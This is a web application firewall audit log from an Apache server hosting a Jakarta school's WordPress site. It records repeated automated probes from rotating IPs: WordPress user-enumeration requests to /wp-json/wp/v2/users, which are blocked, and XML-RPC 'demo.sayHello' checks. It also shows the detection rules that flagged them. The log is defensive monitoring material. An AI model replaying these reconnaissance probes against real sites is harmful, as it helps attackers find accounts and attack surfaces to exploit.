Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eda2479-Z-- --a8f2d504-A-- [17/May/2025:05:05:31 +0700] aCe2qwTOsBn9MSWb6WJqDQAAAI8 103.236.140.4 56376 103.236.140.4 8181 --a8f2d504-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a8f2d504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8f2d504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433131479648 3110 (- - -) Stopwatch2: 1747433131479648 3110; combined=1354, p1=513, p2=811, p3=0, p4=0, p5=29, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f2d504-Z-- --16695354-A-- [17/May/2025:05:05:36 +0700] aCe2sATOsBn9MSWb6WJqDwAAAJI 103.236.140.4 56380 103.236.140.4 8181 --16695354-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16695354-C-- demo.sayHello --16695354-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16695354-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433136364622 5176 (- - -) Stopwatch2: 1747433136364622 5176; combined=3922, p1=501, p2=3204, p3=24, p4=27, p5=96, sr=120, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16695354-Z-- --369c310b-A-- [17/May/2025:05:06:28 +0700] aCe25ATOsBn9MSWb6WJqEAAAAJM 103.236.140.4 56392 103.236.140.4 8181 --369c310b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --369c310b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --369c310b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433188921777 2860 (- - -) Stopwatch2: 1747433188921777 2860; combined=1263, p1=457, p2=776, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --369c310b-Z-- --ab1de31b-A-- [17/May/2025:05:06:34 +0700] aCe26gTOsBn9MSWb6WJqEgAAAJY 103.236.140.4 56396 103.236.140.4 8181 --ab1de31b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab1de31b-C-- demo.sayHello --ab1de31b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab1de31b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433194413693 5001 (- - -) Stopwatch2: 1747433194413693 5001; combined=3771, p1=453, p2=3100, p3=29, p4=22, p5=97, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab1de31b-Z-- --b2453b25-A-- [17/May/2025:05:07:14 +0700] aCe3EgTOsBn9MSWb6WJqFQAAAIM 103.236.140.4 56404 103.236.140.4 8181 --b2453b25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2453b25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2453b25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433234159479 2820 (- - -) Stopwatch2: 1747433234159479 2820; combined=1239, p1=427, p2=782, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2453b25-Z-- --2e856961-A-- [17/May/2025:05:07:19 +0700] aCe3FwTOsBn9MSWb6WJqGQAAAIU 103.236.140.4 56414 103.236.140.4 8181 --2e856961-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e856961-C-- demo.sayHello --2e856961-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e856961-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433239654456 5175 (- - -) Stopwatch2: 1747433239654456 5175; combined=3975, p1=455, p2=3175, p3=24, p4=22, p5=162, sr=71, sw=137, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e856961-Z-- --38137d13-A-- [17/May/2025:05:08:14 +0700] aCe3ThKi5m5upc8uMd6eQAAAAMM 103.236.140.4 56428 103.236.140.4 8181 --38137d13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --38137d13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38137d13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433294512242 3129 (- - -) Stopwatch2: 1747433294512242 3129; combined=1359, p1=497, p2=827, p3=0, p4=0, p5=35, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38137d13-Z-- --b24c9413-A-- [17/May/2025:05:08:20 +0700] aCe3VBKi5m5upc8uMd6eQgAAAMc 103.236.140.4 56432 103.236.140.4 8181 --b24c9413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b24c9413-C-- demo.sayHello --b24c9413-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b24c9413-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433300432719 5174 (- - -) Stopwatch2: 1747433300432719 5174; combined=3517, p1=511, p2=2824, p3=32, p4=34, p5=69, sr=63, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b24c9413-Z-- --62a2d17e-A-- [17/May/2025:05:08:51 +0700] aCe3cwTOsBn9MSWb6WJqHAAAAI4 103.236.140.4 56436 103.236.140.4 8181 --62a2d17e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62a2d17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a2d17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433331932924 3331 (- - -) Stopwatch2: 1747433331932924 3331; combined=1497, p1=512, p2=954, p3=0, p4=0, p5=31, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a2d17e-Z-- --eccc9d30-A-- [17/May/2025:05:08:58 +0700] aCe3ehKi5m5upc8uMd6eRQAAAMs 103.236.140.4 56440 103.236.140.4 8181 --eccc9d30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eccc9d30-C-- demo.sayHello --eccc9d30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eccc9d30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433338503678 6042 (- - -) Stopwatch2: 1747433338503678 6042; combined=4378, p1=597, p2=3533, p3=35, p4=46, p5=98, sr=118, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eccc9d30-Z-- --35066a76-A-- [17/May/2025:05:10:06 +0700] aCe3vhKi5m5upc8uMd6eSAAAANA 103.236.140.4 56446 103.236.140.4 8181 --35066a76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --35066a76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35066a76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433406839364 3193 (- - -) Stopwatch2: 1747433406839364 3193; combined=1329, p1=428, p2=871, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35066a76-Z-- --1ad36606-A-- [17/May/2025:05:10:13 +0700] aCe3xem4kjNN-hEbWjI8dAAAAFU 103.236.140.4 56450 103.236.140.4 8181 --1ad36606-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ad36606-C-- demo.sayHello --1ad36606-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad36606-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433413461099 5854 (- - -) Stopwatch2: 1747433413461099 5854; combined=4378, p1=593, p2=3554, p3=30, p4=35, p5=97, sr=135, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad36606-Z-- --a18d576d-A-- [17/May/2025:05:10:14 +0700] aCe3xum4kjNN-hEbWjI8dQAAAFY 103.236.140.4 56452 103.236.140.4 8181 --a18d576d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a18d576d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a18d576d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433414779812 2296 (- - -) Stopwatch2: 1747433414779812 2296; combined=1141, p1=380, p2=735, p3=0, p4=0, p5=26, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a18d576d-Z-- --291f320f-A-- [17/May/2025:05:10:21 +0700] aCe3zRKi5m5upc8uMd6eTAAAANU 103.236.140.4 56458 103.236.140.4 8181 --291f320f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --291f320f-C-- demo.sayHello --291f320f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --291f320f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433421130510 5632 (- - -) Stopwatch2: 1747433421130510 5632; combined=4164, p1=521, p2=3424, p3=31, p4=34, p5=92, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --291f320f-Z-- --daed6063-A-- [17/May/2025:05:11:20 +0700] aCe4CBKi5m5upc8uMd6eUgAAAMM 103.236.140.4 56474 103.236.140.4 8181 --daed6063-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --daed6063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daed6063-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433480779349 2595 (- - -) Stopwatch2: 1747433480779349 2595; combined=1054, p1=344, p2=689, p3=0, p4=0, p5=21, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daed6063-Z-- --758eb04d-A-- [17/May/2025:05:11:28 +0700] aCe4EBKi5m5upc8uMd6eUwAAAMg 103.236.140.4 56478 103.236.140.4 8181 --758eb04d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --758eb04d-C-- demo.sayHello --758eb04d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --758eb04d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433488576223 4717 (- - -) Stopwatch2: 1747433488576223 4717; combined=3607, p1=385, p2=3001, p3=33, p4=34, p5=91, sr=61, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --758eb04d-Z-- --eeb8d469-A-- [17/May/2025:05:12:44 +0700] aCe4XATOsBn9MSWb6WJqHgAAAJA 103.236.140.4 56486 103.236.140.4 8181 --eeb8d469-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eeb8d469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeb8d469-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747433564654748 2783 (- - -) 